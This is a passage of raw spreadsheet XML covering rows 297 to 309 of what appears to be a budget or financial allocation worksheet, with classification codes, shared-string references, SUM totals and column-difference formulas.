      <c r="Z297" s="17"/>
      <c r="AA297" s="17"/>
      <c r="AB297" s="17"/>
      <c r="AC297" s="17"/>
      <c r="AD297" s="17"/>
      <c r="AE297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AF297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AG297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AH297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AI297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AJ297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AK297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AL297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AM297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AN297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AO297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
      <c r="AP297" s="17">
        <f t="shared" si="138"/>
        <v>0</v>
      </c>
    </row>
    <row r="298" ht="18" customHeight="1" spans="1:42">
      <c r="A298" s="10">
        <v>1030802</v>
      </c>
      <c r="B298" s="16" t="s">
        <v>2997</v>
      </c>
      <c r="C298" s="17">
        <v>0</v>
      </c>
      <c r="D298" s="13">
        <v>20402</v>
      </c>
      <c r="E298" s="11" t="s">
        <v>2998</v>
      </c>
      <c r="F298" s="14">
        <f t="shared" si="107"/>
        <v>311</v>
      </c>
      <c r="G298" s="12">
        <f t="shared" ref="G298:R298" si="139">SUM(G299:G308)</f>
        <v>0</v>
      </c>
      <c r="H298" s="12">
        <f t="shared" si="139"/>
        <v>173</v>
      </c>
      <c r="I298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="J298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="K298" s="12">
        <f t="shared" si="139"/>
        <v>98</v>
      </c>
      <c r="L298" s="12">
        <f t="shared" si="139"/>
        <v>111</v>
      </c>
      <c r="M298" s="12">
        <f t="shared" si="139"/>
        <v>102</v>
      </c>
      <c r="N298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="O298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="P298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="Q298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="R298" s="12">
        <f t="shared" si="139"/>
        <v>0</v>
      </c>
      <c r="S298" s="12">
        <v>0</v>
      </c>
      <c r="T298" s="12">
        <v>137</v>
      </c>
      <c r="U298" s="12">
        <v>0</v>
      </c>
      <c r="V298" s="12">
        <v>0</v>
      </c>
      <c r="W298" s="12">
        <v>91</v>
      </c>
      <c r="X298" s="12">
        <v>103</v>
      </c>
      <c r="Y298" s="12">
        <v>91</v>
      </c>
      <c r="Z298" s="12">
        <v>0</v>
      </c>
      <c r="AA298" s="12">
        <v>0</v>
      </c>
      <c r="AB298" s="12">
        <v>0</v>
      </c>
      <c r="AC298" s="12">
        <v>0</v>
      </c>
      <c r="AD298" s="12">
        <v>0</v>
      </c>
      <c r="AE298" s="12">
        <f t="shared" ref="AE298:AP298" si="140">SUM(AE299:AE308)</f>
        <v>0</v>
      </c>
      <c r="AF298" s="12">
        <f t="shared" si="140"/>
        <v>36</v>
      </c>
      <c r="AG298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AH298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AI298" s="12">
        <f t="shared" si="140"/>
        <v>7</v>
      </c>
      <c r="AJ298" s="12">
        <f t="shared" si="140"/>
        <v>8</v>
      </c>
      <c r="AK298" s="12">
        <f t="shared" si="140"/>
        <v>11</v>
      </c>
      <c r="AL298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AM298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AN298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AO298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
      <c r="AP298" s="12">
        <f t="shared" si="140"/>
        <v>0</v>
      </c>
    </row>
    <row r="299" ht="18" customHeight="1" spans="1:42">
      <c r="A299" s="10">
        <v>10309</v>
      </c>
      <c r="B299" s="11" t="s">
        <v>2999</v>
      </c>
      <c r="C299" s="12">
        <f>SUM(C300:C304)</f>
        <v>0</v>
      </c>
      <c r="D299" s="13">
        <v>2040201</v>
      </c>
      <c r="E299" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F299" s="14">
        <f t="shared" si="107"/>
        <v>200</v>
      </c>
      <c r="G299" s="17"/>
      <c r="H299" s="17"/>
      <c r="I299" s="17"/>
      <c r="J299" s="17"/>
      <c r="K299" s="17">
        <v>98</v>
      </c>
      <c r="L299" s="17"/>
      <c r="M299" s="17">
        <v>102</v>
      </c>
      <c r="N299" s="17"/>
      <c r="O299" s="17"/>
      <c r="P299" s="17"/>
      <c r="Q299" s="17"/>
      <c r="R299" s="17"/>
      <c r="S299" s="17"/>
      <c r="T299" s="17"/>
      <c r="U299" s="17"/>
      <c r="V299" s="17"/>
      <c r="W299" s="17">
        <v>91</v>
      </c>
      <c r="X299" s="17"/>
      <c r="Y299" s="17">
        <v>91</v>
      </c>
      <c r="Z299" s="17"/>
      <c r="AA299" s="17"/>
      <c r="AB299" s="17"/>
      <c r="AC299" s="17"/>
      <c r="AD299" s="17"/>
      <c r="AE299" s="17">
        <f t="shared" ref="AE299:AP308" si="141">G299-S299</f>
        <v>0</v>
      </c>
      <c r="AF299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI299" s="17">
        <f t="shared" si="141"/>
        <v>7</v>
      </c>
      <c r="AJ299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK299" s="17">
        <f t="shared" si="141"/>
        <v>11</v>
      </c>
      <c r="AL299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP299" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="300" ht="18" customHeight="1" spans="1:42">
      <c r="A300" s="10">
        <v>1030901</v>
      </c>
      <c r="B300" s="16" t="s">
        <v>3000</v>
      </c>
      <c r="C300" s="17">
        <v>0</v>
      </c>
      <c r="D300" s="13">
        <v>2040202</v>
      </c>
      <c r="E300" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F300" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G300" s="17"/>
      <c r="H300" s="17"/>
      <c r="I300" s="17"/>
      <c r="J300" s="17"/>
      <c r="K300" s="17"/>
      <c r="L300" s="17"/>
      <c r="M300" s="17"/>
      <c r="N300" s="17"/>
      <c r="O300" s="17"/>
      <c r="P300" s="17"/>
      <c r="Q300" s="17"/>
      <c r="R300" s="17"/>
      <c r="S300" s="17"/>
      <c r="T300" s="17"/>
      <c r="U300" s="17"/>
      <c r="V300" s="17"/>
      <c r="W300" s="17"/>
      <c r="X300" s="17"/>
      <c r="Y300" s="17"/>
      <c r="Z300" s="17"/>
      <c r="AA300" s="17"/>
      <c r="AB300" s="17"/>
      <c r="AC300" s="17"/>
      <c r="AD300" s="17"/>
      <c r="AE300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP300" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="301" ht="18" customHeight="1" spans="1:42">
      <c r="A301" s="10">
        <v>1030902</v>
      </c>
      <c r="B301" s="16" t="s">
        <v>3001</v>
      </c>
      <c r="C301" s="17">
        <v>0</v>
      </c>
      <c r="D301" s="13">
        <v>2040203</v>
      </c>
      <c r="E301" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F301" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G301" s="17"/>
      <c r="H301" s="17"/>
      <c r="I301" s="17"/>
      <c r="J301" s="17"/>
      <c r="K301" s="17"/>
      <c r="L301" s="17"/>
      <c r="M301" s="17"/>
      <c r="N301" s="17"/>
      <c r="O301" s="17"/>
      <c r="P301" s="17"/>
      <c r="Q301" s="17"/>
      <c r="R301" s="17"/>
      <c r="S301" s="17"/>
      <c r="T301" s="17"/>
      <c r="U301" s="17"/>
      <c r="V301" s="17"/>
      <c r="W301" s="17"/>
      <c r="X301" s="17"/>
      <c r="Y301" s="17"/>
      <c r="Z301" s="17"/>
      <c r="AA301" s="17"/>
      <c r="AB301" s="17"/>
      <c r="AC301" s="17"/>
      <c r="AD301" s="17"/>
      <c r="AE301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP301" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="302" ht="18" customHeight="1" spans="1:42">
      <c r="A302" s="10">
        <v>1030903</v>
      </c>
      <c r="B302" s="16" t="s">
        <v>3002</v>
      </c>
      <c r="C302" s="17">
        <v>0</v>
      </c>
      <c r="D302" s="18">
        <v>2040219</v>
      </c>
      <c r="E302" s="19" t="s">
        <v>2622</v>
      </c>
      <c r="F302" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G302" s="20"/>
      <c r="H302" s="20"/>
      <c r="I302" s="20"/>
      <c r="J302" s="20"/>
      <c r="K302" s="20"/>
      <c r="L302" s="20"/>
      <c r="M302" s="20"/>
      <c r="N302" s="20"/>
      <c r="O302" s="20"/>
      <c r="P302" s="20"/>
      <c r="Q302" s="20"/>
      <c r="R302" s="20"/>
      <c r="S302" s="20"/>
      <c r="T302" s="20"/>
      <c r="U302" s="20"/>
      <c r="V302" s="20"/>
      <c r="W302" s="20"/>
      <c r="X302" s="20"/>
      <c r="Y302" s="20"/>
      <c r="Z302" s="20"/>
      <c r="AA302" s="20"/>
      <c r="AB302" s="20"/>
      <c r="AC302" s="20"/>
      <c r="AD302" s="20"/>
      <c r="AE302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP302" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="303" ht="18" customHeight="1" spans="1:42">
      <c r="A303" s="10">
        <v>1030904</v>
      </c>
      <c r="B303" s="16" t="s">
        <v>3003</v>
      </c>
      <c r="C303" s="17">
        <v>0</v>
      </c>
      <c r="D303" s="13">
        <v>2040220</v>
      </c>
      <c r="E303" s="16" t="s">
        <v>3004</v>
      </c>
      <c r="F303" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G303" s="17"/>
      <c r="H303" s="17"/>
      <c r="I303" s="17"/>
      <c r="J303" s="17"/>
      <c r="K303" s="17"/>
      <c r="L303" s="17"/>
      <c r="M303" s="17"/>
      <c r="N303" s="17"/>
      <c r="O303" s="17"/>
      <c r="P303" s="17"/>
      <c r="Q303" s="17"/>
      <c r="R303" s="17"/>
      <c r="S303" s="17"/>
      <c r="T303" s="17"/>
      <c r="U303" s="17"/>
      <c r="V303" s="17"/>
      <c r="W303" s="17"/>
      <c r="X303" s="17"/>
      <c r="Y303" s="17"/>
      <c r="Z303" s="17"/>
      <c r="AA303" s="17"/>
      <c r="AB303" s="17"/>
      <c r="AC303" s="17"/>
      <c r="AD303" s="17"/>
      <c r="AE303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP303" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="304" ht="18" customHeight="1" spans="1:42">
      <c r="A304" s="10">
        <v>1030999</v>
      </c>
      <c r="B304" s="16" t="s">
        <v>3005</v>
      </c>
      <c r="C304" s="17">
        <v>0</v>
      </c>
      <c r="D304" s="13">
        <v>2040221</v>
      </c>
      <c r="E304" s="16" t="s">
        <v>3006</v>
      </c>
      <c r="F304" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G304" s="17"/>
      <c r="H304" s="17"/>
      <c r="I304" s="17"/>
      <c r="J304" s="17"/>
      <c r="K304" s="17"/>
      <c r="L304" s="17"/>
      <c r="M304" s="17"/>
      <c r="N304" s="17"/>
      <c r="O304" s="17"/>
      <c r="P304" s="17"/>
      <c r="Q304" s="17"/>
      <c r="R304" s="17"/>
      <c r="S304" s="17"/>
      <c r="T304" s="17"/>
      <c r="U304" s="17"/>
      <c r="V304" s="17"/>
      <c r="W304" s="17"/>
      <c r="X304" s="17"/>
      <c r="Y304" s="17"/>
      <c r="Z304" s="17"/>
      <c r="AA304" s="17"/>
      <c r="AB304" s="17"/>
      <c r="AC304" s="17"/>
      <c r="AD304" s="17"/>
      <c r="AE304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP304" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="305" ht="18" customHeight="1" spans="1:42">
      <c r="A305" s="10">
        <v>10399</v>
      </c>
      <c r="B305" s="11" t="s">
        <v>3007</v>
      </c>
      <c r="C305" s="12">
        <f>SUM(C306:C313)</f>
        <v>0</v>
      </c>
      <c r="D305" s="13">
        <v>2040222</v>
      </c>
      <c r="E305" s="16" t="s">
        <v>3008</v>
      </c>
      <c r="F305" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G305" s="17"/>
      <c r="H305" s="17"/>
      <c r="I305" s="17"/>
      <c r="J305" s="17"/>
      <c r="K305" s="17"/>
      <c r="L305" s="17"/>
      <c r="M305" s="17"/>
      <c r="N305" s="17"/>
      <c r="O305" s="17"/>
      <c r="P305" s="17"/>
      <c r="Q305" s="17"/>
      <c r="R305" s="17"/>
      <c r="S305" s="17"/>
      <c r="T305" s="17"/>
      <c r="U305" s="17"/>
      <c r="V305" s="17"/>
      <c r="W305" s="17"/>
      <c r="X305" s="17"/>
      <c r="Y305" s="17"/>
      <c r="Z305" s="17"/>
      <c r="AA305" s="17"/>
      <c r="AB305" s="17"/>
      <c r="AC305" s="17"/>
      <c r="AD305" s="17"/>
      <c r="AE305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP305" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="306" ht="18" customHeight="1" spans="1:42">
      <c r="A306" s="10">
        <v>1039904</v>
      </c>
      <c r="B306" s="16" t="s">
        <v>3009</v>
      </c>
      <c r="C306" s="17">
        <v>0</v>
      </c>
      <c r="D306" s="13">
        <v>2040223</v>
      </c>
      <c r="E306" s="16" t="s">
        <v>3010</v>
      </c>
      <c r="F306" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G306" s="17"/>
      <c r="H306" s="17"/>
      <c r="I306" s="17"/>
      <c r="J306" s="17"/>
      <c r="K306" s="17"/>
      <c r="L306" s="17"/>
      <c r="M306" s="17"/>
      <c r="N306" s="17"/>
      <c r="O306" s="17"/>
      <c r="P306" s="17"/>
      <c r="Q306" s="17"/>
      <c r="R306" s="17"/>
      <c r="S306" s="17"/>
      <c r="T306" s="17"/>
      <c r="U306" s="17"/>
      <c r="V306" s="17"/>
      <c r="W306" s="17"/>
      <c r="X306" s="17"/>
      <c r="Y306" s="17"/>
      <c r="Z306" s="17"/>
      <c r="AA306" s="17"/>
      <c r="AB306" s="17"/>
      <c r="AC306" s="17"/>
      <c r="AD306" s="17"/>
      <c r="AE306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP306" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="307" ht="18" customHeight="1" spans="1:42">
      <c r="A307" s="10">
        <v>1039907</v>
      </c>
      <c r="B307" s="16" t="s">
        <v>3011</v>
      </c>
      <c r="C307" s="17">
        <v>0</v>
      </c>
      <c r="D307" s="13">
        <v>2040250</v>
      </c>
      <c r="E307" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F307" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G307" s="17"/>
      <c r="H307" s="17"/>
      <c r="I307" s="17"/>
      <c r="J307" s="17"/>
      <c r="K307" s="17"/>
      <c r="L307" s="17"/>
      <c r="M307" s="17"/>
      <c r="N307" s="17"/>
      <c r="O307" s="17"/>
      <c r="P307" s="17"/>
      <c r="Q307" s="17"/>
      <c r="R307" s="17"/>
      <c r="S307" s="17"/>
      <c r="T307" s="17"/>
      <c r="U307" s="17"/>
      <c r="V307" s="17"/>
      <c r="W307" s="17"/>
      <c r="X307" s="17"/>
      <c r="Y307" s="17"/>
      <c r="Z307" s="17"/>
      <c r="AA307" s="17"/>
      <c r="AB307" s="17"/>
      <c r="AC307" s="17"/>
      <c r="AD307" s="17"/>
      <c r="AE307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AG307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AK307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP307" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="308" ht="18" customHeight="1" spans="1:42">
      <c r="A308" s="10">
        <v>1039908</v>
      </c>
      <c r="B308" s="16" t="s">
        <v>3012</v>
      </c>
      <c r="C308" s="17">
        <v>0</v>
      </c>
      <c r="D308" s="13">
        <v>2040299</v>
      </c>
      <c r="E308" s="16" t="s">
        <v>3013</v>
      </c>
      <c r="F308" s="14">
        <f t="shared" si="107"/>
        <v>111</v>
      </c>
      <c r="G308" s="17"/>
      <c r="H308" s="17">
        <v>173</v>
      </c>
      <c r="I308" s="17"/>
      <c r="J308" s="17"/>
      <c r="K308" s="17"/>
      <c r="L308" s="17">
        <v>111</v>
      </c>
      <c r="M308" s="17"/>
      <c r="N308" s="17"/>
      <c r="O308" s="17"/>
      <c r="P308" s="17"/>
      <c r="Q308" s="17"/>
      <c r="R308" s="17"/>
      <c r="S308" s="17"/>
      <c r="T308" s="17">
        <v>137</v>
      </c>
      <c r="U308" s="17"/>
      <c r="V308" s="17"/>
      <c r="W308" s="17"/>
      <c r="X308" s="17">
        <v>103</v>
      </c>
      <c r="Y308" s="17"/>
      <c r="Z308" s="17"/>
      <c r="AA308" s="17"/>
      <c r="AB308" s="17"/>
      <c r="AC308" s="17"/>
      <c r="AD308" s="17"/>
      <c r="AE308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AF308" s="17">
        <f t="shared" si="141"/>
        <v>36</v>
      </c>
      <c r="AG308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AH308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AI308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AJ308" s="17">
        <f t="shared" si="141"/>
        <v>8</v>
      </c>
      <c r="AK308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AL308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AM308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AN308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AO308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
      <c r="AP308" s="17">
        <f t="shared" si="141"/>
        <v>0</v>
      </c>
    </row>
    <row r="309" ht="18" customHeight="1" spans="1:42">
      <c r="A309" s="10">
        <v>1039912</v>
      </c>
      <c r="B309" s="16" t="s">
        <v>3014</v>
      </c>
      <c r="C309" s="17">
        <v>0</v>
      </c>
      <c r="D309" s="13">
        <v>20403</v>
      </c>
      <c r="E309" s="11" t="s">
        <v>3015</v>
      </c>
      <c r="F309" s="14">
        <f t="shared" si="107"/>
        <v>0</v>
      </c>
      <c r="G309" s="12">
        <f t="shared" ref="G309:R309" si="142">SUM(G310:G315)</f>
        <v>0</v>
      </c>
      <c r="H309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="I309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="J309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="K309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="L309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="M309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="N309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="O309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="P309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="Q309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="R309" s="12">
        <f t="shared" si="142"/>
        <v>0</v>
      </c>
      <c r="S309" s="12">
        <v>0</v>
      </c>
      <c r="T309" s="12">
        <v>0</v>
      </c>
      <c r="U309" s="12">
        <v>0</v>
      </c>
      <c r="V309" s="12">
        <v>0</v>
      </c>
      <c r="W309" s="12">
        <v>0</v>
      </c>
      <c r="X309" s="12">
        <v>0</v>
      </c>
      <c r="Y309" s="12">
        <v>0</v>
      </c>
      <c r="Z309" s="12">
        <v>0</v>
      </c>
      <c r="AA309" s="12">
        <v>0</v>
      </c>
      <c r="AB309" s="12">
        <v>0</v>
      </c>
      <c r="AC309" s="12">
        <v>0</v>
      </c>
      <c r="AD309" s="12">
        <v>0</v>
      </c>
      <c r="AE309" s="12">
        <f t="shared" ref="AE309:AP309" si="143">SUM(AE310:AE315)</f>
        <v>0</v>
      </c>
      <c r="AF309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AG309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AH309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AI309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AJ309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AK309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AL309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AM309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AN309" s="12">
        <f t="shared" si="143"/>
        <v>0</v>
      </c>
      <c r="AO309" s="12">
        <f t="shared" si="143"/>
